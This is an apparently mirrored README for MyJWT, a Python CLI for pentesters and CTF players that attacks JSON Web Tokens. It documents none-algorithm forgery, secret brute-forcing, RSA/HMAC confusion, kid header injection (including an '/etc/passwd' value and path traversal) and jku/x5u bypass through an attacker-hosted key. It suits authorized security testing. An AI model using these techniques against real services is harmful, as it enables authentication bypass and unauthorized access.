项目作者: mBouamama

项目描述 :
A cli for cracking, testing vulnerabilities on Json Web Token(JWT)
高级语言: Python
项目地址: git://github.com/mBouamama/MyJWT.git
创建时间: 2020-10-26T20:11:56Z
项目社区:https://github.com/mBouamama/MyJWT

开源协议:MIT License

下载


MyJWT

mBouamama
PyPI
BlackArch package
PyPI - Python Version
PyPI - Download
GitHub release (latest by date)
Documentation Status
Rawsec's CyberSecurity Inventory
Code style: black
codecov
docstr_coverage
codebeat badge
Updates
Known Vulnerabilities

Introduction

This cli is for pentesters, CTF players, or dev.

You can modify your jwt, sign, inject ,etc…

Check Documentation for more information.

If you see problems or enhancement send an issue.I will respond as soon as possible.
Enjoy :)

Documentation

Documentation is available at http://myjwt.readthedocs.io

Table of Contents

Installation

To install myjwt, simply use pip:

  1. pip install myjwt

To run mywt from a docker image, run:

  1. docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
  2. # mount volume for wordlist
  3. docker run -v $(pwd)/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
  4. # On Windows
  5. docker run -v %CD%/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

To install myjwt, on git:

  1. git clone https://github.com/mBouamama/MyJWT.git
  2. cd ./MyJWT
  3. pip install -r requirements.txt
  4. python MyJWT/myjwt_cli.py --help

To install myjwt on BlackArch:

  1. pacman -S myjwt

Packaging status

Usage

  1. $ myjwt --help
  2. Usage: myjwt [OPTIONS] JWT
  3. This cli is for pentesters, CTF players, or dev.
  4. You can modify your jwt, sign, inject ,etc...
  5. Full documentation is at http://myjwt.readthedocs.io.
  6. If you see problems or enhancement send an issue.I will respond as soon as possible.
  7. Enjoy :)
  8. All new jwt will be copy to the clipboard.
  9. Options:
  10. --version Show the version and exit.
  11. --full-payload TEXT New payload for your jwt.Json format Required.
  12. -h, --add-header TEXT Add a new key, value to your jwt header, if key
  13. is present old value will be replaced.Format:
  14. key=value.
  15. -p, --add-payload TEXT Add a new key, value to your jwt payload, if
  16. key is present old value will be
  17. replaced.Format: key=value.
  18. --sign TEXT Sign Your jwt with key given.
  19. --verify TEXT verify your key.
  20. -none, --none-vulnerability Check None Alg vulnerability.
  21. --hmac PATH Check RS/HMAC Alg vulnerability.
  22. --bruteforce PATH Bruteforce to guess the secret used to sign the
  23. token.
  24. -c, --crack TEXT regex to iterate all string possibilities to
  25. guess the secret used to sign the token.
  26. --kid TEXT Kid Injection sql
  27. --jku TEXT Jku Header to bypass authentication
  28. --x5u TEXT X5u Header to bypass authentication
  29. --crt TEXT For x5cHeader, force crt file
  30. --key TEXT For jku or x5c Header, force private key to
  31. your key file
  32. --file TEXT For jku Header and x5u Header, force file name
  33. --print Print Decoded JWT
  34. -u, --url TEXT Url to send your jwt.
  35. -m, --method TEXT Method use for send request to url.(Default
  36. GET).
  37. -d, --data TEXT Data send to your url.Format: key=value. if
  38. value = MY_JWT value will be replace by new
  39. jwt.
  40. -c, --cookies TEXT Cookies to send to your url.Format: key=value.
  41. if value = MY_JWT value will be replace by new
  42. jwt.
  43. --help Show this message and exit.

Modify JWT

Option Type Example help
—ful-payload JSON {“user”: “admin”} New payload for your jwt.
-h, —add-header key=value user=admin Add a new key, value to your jwt header, if key is present old value will be replaced.
-p, —add-payload key=value user=admin Add a new key, value to your jwt payload, if key is present old value will be replaced.

Check Your JWT (HS alg)

Option Type Example help
—sign text mysecretkey Sign Your jwt with your key
—verify text mysecretkey Verify your key.

Exploit

Option Type Example help
-none, —none-vulnerability Nothing Check None Alg vulnerability.
—hmac PATH ./public.pem Check RS/HMAC Alg vulnerability, and sign your jwt with public key.
—bruteforce PATH ./wordlist/big.txt Bruteforce to guess th secret used to sign the token. Use txt file with all password stored(1 by line)
—crack REGEX “[a-z]{4}” regex to iterate all string possibilities to guess the secret used to sign the token.
—kid text “00; echo /etc/.passwd” Kid Injection sql
—jku text MYPUBLICIP Jku Header to bypass authentication, use —file if you want to change your jwks file name, and —key if you want to use your own private pem
—x5u text MYPUBLICIP For jku or x5c Header, use —file if you want to change your jwks file name, and —key if you want to use your own private pem

Send your jwt

Option Type Example help
-u, —url url http://challenge01.root-me.org/web-serveur/ch59/admin Url to send your jwt.
-m, —method text POST Method use to send request to url.(Default: GET).
-d, —data key=value secret=MY_JWT Data send to your url.Format: key=value. if value = MY_JWT value will be replace by your new jwt.
-c, —cookies key=value secret=MY_JWT Cookies to send to your url.Format: key=value.if value = MY_JWT value will be replace by your new jwt.

Other

Option Type Example help
—crt PATH ./public.crt For x5cHeader, force crt file
—key PATH ./private.pem For jku or x5c Header, force private key to your key file
—file text myfile For jku Header, force file name without .json extension
—print Nothing Print Decoded JWT
—help Nothing Show Helper message and exit.
—version Nothing Show Myjwt version

Examples

jwt_json = jwt_to_json(jwt)
jwt_json = add_header(jwt_json, {“kid”: “001”})
jwt_json = change_payload(jwt_json, {“username”: “admin”})
jwt = encode_jwt(jwt_json) + “.” + jwt_json[SIGNATURE]

  1. Full example here: [01-modify-jwt](https://github.com/mBouamama/MyJWT/blob/master/examples/01-modify-jwt/modify-jwt.py)
  2. ## None Vulnerability
  3. ### CLI

myjwt YOUR_JWT —none-vulnerability

  1. ### CODE

from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
from myjwt.vulnerabilities import none_vulnerability
jwt_json = jwt_to_json(jwt)
jwt = none_vulnerability(encode_jwt(jwt_json) + “.” + jwt_json[SIGNATURE])

  1. Full example here: [02-none-vulnerability](https://github.com/mBouamama/MyJWT/blob/master/examples/02-none-vulnerability/none-vulnerability.py)
  2. ## Sign Key
  3. ### CLI

myjwt YOUR_JWT —sign YOUR_KEY

  1. ### CODE

from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
key = “test”
jwt = signature(jwt_to_json(jwt), key)

  1. Full example here: [03-sign-key](https://github.com/mBouamama/MyJWT/blob/master/examples/03-sign-key/sign-key.py)
  2. ## Brute Force
  3. ### CLI

myjwt YOUR_JWT —bruteforce PATH

  1. ### CODE

from myjwt.vulnerabilities import bruteforce_wordlist
wordlist = “../../wordlist/common_pass.txt”
key = bruteforce_wordlist(jwt, wordlist)

  1. Full example here: [04-brute-force](https://github.com/mBouamama/MyJWT/blob/master/examples/04-brute-force/brute-force.py)
  2. ## Crack
  3. ### CLI

myjwt YOUR_JWT —crack REGEX

  1. ## RSA/HMAC Confusion
  2. ### CLI

myjwt YOUR_JWT —hmac FILE

  1. ### CODE

from myjwt.vulnerabilities import confusion_rsa_hmac
file = “public.pem”
jwt = confusion_rsa_hmac(jwt, file)

  1. Full example here: [05-rsa-hmac-confusion](https://github.com/mBouamama/MyJWT/blob/master/examples/05-rsa-hmac-confusion/rsa-hmac-confusion.py)
  2. ## Kid Injection
  3. ### CLI

myjwt YOUR_JWT —kid INJECTION

  1. ### Code

from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
from myjwt.vulnerabilities import inject_sql_kid

injection = “../../../../../../dev/null”
sign = “”
jwt = inject_sql_kid(jwt, injection)
jwt = signature(jwt_to_json(jwt), sign)

  1. Full example here: [06-kid-injection](https://github.com/mBouamama/MyJWT/blob/master/examples/06-kid-injection/kid-injection.py)
  2. ## Send your new Jwt to url
  3. ### CLI

myjwt YOUR_JWT -u YOUR_URL -c “jwt=MY_JWT” —non-vulnerability —add-payload “username=admin”

  1. ## Jku Vulnerability
  2. ### CLI

myjwt YOUR_JWT —jku YOUR_URL

  1. ### Code

from myjwt.vulnerabilities import jku_vulnerability
new_jwt = jku_vulnerability(jwt=jwt, url=”MYPUBLIC_IP”)
print(jwt)

  1. Full example here: [07-jku-bypass](https://github.com/mBouamama/MyJWT/blob/master/examples/07-jku-bypass/jku-bypass.py)
  2. ## X5U Vulnerability
  3. ### CLI

myjwt YOUR_JWT —x5u YOUR_URL

  1. ### Code

from myjwt.vulnerabilities import x5u_vulnerability
newJwt = x5u_vulnerability(jwt=jwt, url=”MYPUBLIC_IP”)
print(jwt)
```
Full example here: 08-x5u-bypass

Download

Check github releases. Latest is available at https://github.com/mBouamama/MyJWT/releases/latest

Contribute

  • Fork this repository or clone it
  • Create a new branch (feature, hotfix, etc…)
  • Make necessary changes and commit those changes
  • Check lint with make lint
  • Check unit_test with make test
  • Send Pull Request
    I will check as Soon as Possible.

Change log

The log’s become rather long. It moved to its own file.

See CHANGES.